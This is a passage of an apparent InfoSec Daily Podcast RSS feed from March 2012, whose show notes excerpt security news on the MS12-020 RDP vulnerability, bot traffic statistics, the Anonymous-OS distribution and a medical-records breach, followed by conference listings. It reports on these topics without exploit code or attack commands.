<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://akamai.infoworld.com/d/security/experts-sound-worm-alarm-critical-windows-bug-188615"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://akamai.infoworld.com/d/security/experts-sound-worm-alarm-critical-windows-bug-188615</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Microsoft today released six security updates that patched seven vulnerabilities, including a critical Windows bug that hackers will certainly try to exploit with a network worm, according to researchers.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;This is a pre-authentication, remote code bug,&quot; said Andrew Storms, director of security operations at nCircle Security, referring to MS12-020, the one critical bulletin today and the update that he, other researchers and even Microsoft urged users to patch as soon as possible.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;It will allow network execution without any authentication and has all the ingredients for a class worm,&quot; said Storms.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;I&#39;m particular spooked by this one,&quot; said Jason Miller, manager of research and development at VMware. &quot;Hackers want [vulnerabilities] that don&#39;t require authentication and are in a part of Windows that&#39;s widely used. I guarantee that attackers are going to look at this closely.&quot;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://technet.microsoft.com/en-us/security/bulletin/ms12-020"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">MS12-020</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> patches a pair of bugs in Windows&#39; RDP (Remote Desktop Protocol), a component that lets users remotely access a PC or server. RDP is frequently used by corporate help desks, off-site users, and IT administrators to manage servers at company data centers and those the enterprise farms out to cloud-based service providers like Amazon and Microsoft.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The critical vulnerability, dubbed CVE-2012-0002, could be exploited by an attacker who simply sends specially-crafted data packets to a system with RDP enabled, said Microsoft.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;Absolutely, this will be very attractive to hackers,&quot; said Amol Sarwate, manager of Qualys&#39; vulnerability research lab, echoing Storms and Miller. &quot;It doesn&#39;t look like it&#39;s that complicated to come up with the code sequence [to trigger the bug].&quot;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.zdnet.com/blog/foremski/report-51-of-web-site-traffic-is-non-human-and-mostly-malicious/2201"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.zdnet.com/blog/foremski/report-51-of-web-site-traffic-is-non-human-and-mostly-malicious/2201</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://www.incapsula.com/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Incapsula</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, a provider of cloud-based security for web sites, released a study today showing that 51% of web site traffic is automated software programs, and the majority is potentially damaging, &mdash; automated exploits from hackers, spies, scrapers, and spammers.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The company says that typically, only 49% of a web site&rsquo;s visitors are actual humans and that the non-human traffic is mostly invisible because it is not shown by analytics software.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This means that web sites are carrying a large hidden cost burden in terms of bandwidth, increased risk of business disruption, and worse.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Here&rsquo;s a breakdown of an average web site&rsquo;s traffic:</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">- 5% is hacking tools searching for an unpatched or new vulnerability in a web site.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">- 5% is scrapers.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">- 2% is automated comment spammers.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">- 19% is from &ldquo;spies&rdquo; collecting competitive intelligence.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">- 20% is from search engines &#8211; which is non-human traffic but benign.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">- 49% is from people browsing the Internet.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The data was collected from a sample of 1,000 websites that are enrolled in the Incapsula service.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">I spoke with Marc Gaffan, co-founder of Incapsula. &ldquo;Few people realize how much of their traffic is non-human, and that much of it is potentially harmful.&rdquo;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Incapsula offers a service aimed at securing small and medium sized businesses. It has a global network of nine data centers that analyze all traffic to a customer&rsquo;s site and blocking harmful exploits in real-time, while also speeding up page loading times through cached content closer to users.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;Because we have thousands of web sites as customers, we spot exploits way ahead of others and we can then block them for all our customers. That&rsquo;s the benefit of scale. We also maintain a virtual patch service that prevents harmful exploits days and sometimes weeks before a patch is ready.&rdquo;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">There is no software or hardware installation required by the customer, a small change in a web site&rsquo;s DNS records directs traffic through Incapsula&rsquo;s data centers. And all analytics, and search engine rankings, are unaffected by the change.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Web sites are significantly faster because the company caches content and keeps it close to where users are located.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">An important aspect of the service is that it is in compliance with the Payment Card Industry data security standard (PCI) which is essential for online merchants. They risk losing their ability to process credit card payments if they don&rsquo;t meet strict</span><a href="https://www.pcisecuritystandards.org/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> PCI</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> requirements.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The company offers a free service for sites with less than 25 GB of monthly bandwidth, and premium plans start at $49 a month.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://threatpost.com/en_us/blogs/new-linux-distro-promoted-anonymous-os-031412"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://threatpost.com/en_us/blogs/new-linux-distro-promoted-anonymous-os-031412</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A new Ubuntu Linux distribution is being marketed as &quot;Anonymous-OS&quot; and comes pre-loaded with tools for hacking and protecting anonymity online. However, it is unclear whether the new operating system was created by the anarchic hacking group, or even has its endorsement.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Anonymous-OS Version 0.1 was released on Tuesday and is</span><a href="http://anonymous-os.tumblr.com/download"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">being offered from Sourceforge and as a bitTorrent download</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, according to a post on a Tumblr.com page for Anonymous-OS. The operating system is an Ubuntu-based Linux distribution that was created under Ubuntu version 11.10. It uses the Mate Desktop Environment. The operating system was created for &quot;educational purposes&quot; to &quot;(check) the security of Web pages,&quot; according to the Anonymous-OS Tumblr page.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The new distribution comes loaded with tools useful to hackers, security researchers and those interested in perserving their anonymity online. Among the applications bundled with Anonymous-OS are the anonymizing Tor client, Wireshark, a network protocol analyzer, password cracker John the Ripper and Pyloris, a tool for launching denial of service attacks.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size: 15px; font-family: Arial; color: rgb(0, 0, 0); background-color: transparent; font-weight: normal; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline;">&#8230;</span></p>
<p>
	&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-619-breach2collapse-spying-clouds-ms12-020-not-human-and-anonymous-os/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3638/0/infosec-daily-podcast-episode-619.mp3" length="17666385" type="audio/mpeg" />
		<itunes:duration>0:36:45</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 619 for March 14, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, and Karthik Rangarajan.
&#160;
Announcements:
InfoSec Southwest
	When: March 30-April 1
	Where: Austin, TX
	http://www.Infosecsouthwest.com
[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 619 for March 14, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, and Karthik Rangarajan.
&#160;
Announcements:
InfoSec Southwest
	When: March 30-April 1
	Where: Austin, TX
	http://www.Infosecsouthwest.com
&#160;
Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
&#160;
AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center &#8211; Huntington, West Virginia
	http://www.appyide.org/
&#160;
LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
&#160;
Security 504: Hacker Techniques, Exploits &#38; Incident Handling &#8211; Matt Romanek
	When: June 20 &#8211; 27, 2012
	Where: Courtyard Seattle Federal Way, WA http://www.sans.org/mentor/details.php?nid=28014
&#160;
Social Engineering Training
	When: July 21-24, 2012
	Where: Black Hat Vegas
When: August 20-24, 2012
	Where: &#160;Bristol, UK
When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD
	http://www.social-engineer.com/social-engineer-training
&#160;
Inside and Out of the Social-Engineer Toolkit (SET)
	When: July 21 &#8211; 22, 2012
	When: July 23 &#8211; 24, 2012
	Where: Black Hat Vegas
	http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html
&#160;
DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
&#160;
Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
&#160;
You don't have a sufficient version of Flash Player to display this animation.
&#160;
Stories
Source: &#160;&#160;http://blogs.wsj.com/bankruptcy/2012/03/12/burglary-triggers-medical-records-firm%E2%80%99s-collapse/
Impairment Resources LLC filed for bankruptcy Friday after the break-in at its San Diego headquarters led to the electronic escape of detailed medical information for roughly 14,000 people, according to papers filed in U.S. Bankruptcy Court in Wilmington, Del. That information included patient addresses, social security numbers and medical diagnoses.
Police never caught the criminals, and company executives were required by law to report the breach to state attorneys general and the Department of Labor&#8217;s Office of Inspector General. Some of those agencies, including the Department of Labor, are still investigating the matter, the company said in court papers.
&#8220;The cost of dealing with the breach was prohibitive&#8221; for the company, Impairment Resources said when explaining its decision to file for Chapter 7 bankruptcy protection. That type of bankruptcy is used most often by companies to shut down and sell off what&#8217;s left to pay off their debts.
The company said its assets are worth about $226,000, an amount that, even after money trickles in from liquidating sales, likely won&#8217;t be enough to pay lender Insurance Recovery Group and its $583,000 loan, Impairment Resources said in court papers.
The company also faced the threat of even more debt with customers and individuals threatening to sue it over the privacy breach.
&#8230;.
Source: http://www.nextgov.com/nextgov/ng_20120313_1694.php
By sharing national security intelligence through the cloud, the government can modulate the classification level of information and who has permission to see the data, a Pentagon intelligence official said Wednesday.
While some federal agencies shy away from cloud computing for fear of losing control over their data, the intelligence community and military increasingly are turning to networked services expressly to exert tighter security restraints.
&#34;We have nobs to turn that actually give us much more fidelity,&#34; said Jim Heath, National Secu[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 618 &#8211; Stratfor 700K, Vatican Again, Framesniffing and FC Barcelona</title>
		<link>http://www.isdpodcast.com/episode-618-stratfor-700k-vatican-again-framesniffing-and-fc-barcelona</link>
		<comments>http://www.isdpodcast.com/episode-618-stratfor-700k-vatican-again-framesniffing-and-fc-barcelona#comments</comments>
		<pubDate>Wed, 14 Mar 2012 00:50:18 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3633</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 618 for March 13, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Themson Mester. &#160;Special Guest Co-Host Varun Sharma. &#160; Announcements: How to Rob a Bank in 30 Days or less When: March 14th 2012 Where: http://securityzone.co/webinar-en.html Sign up for the webinar that will probably get [...]]]></description>
			<content:encoded><![CDATA[<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size: 13px; font-family: Verdana; color: rgb(0, 0, 0); background-color: rgb(255, 255, 255); font-weight: bold; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline;">InfoSec Daily Podcast Episode 618 for March 13, 2012. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan</span><span id="internal-source-marker_0.06392068851090071" style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, and Themson Mester. &nbsp;Special Guest Co-Host Varun Sharma.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">How to Rob a Bank in 30 Days or less</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 14th 2012</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where:</span><a href="http://securityzone.co/webinar-en.html"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://securityzone.co/webinar-en.html</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Sign up for the webinar that will probably get b0n3z on that watchlist</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: &nbsp;Bristol, UK</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Southwest</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 30-April 1</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Austin, TX</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://www.infosecsouthwest.com/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.Infosecsouthwest.com</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012</span></p>
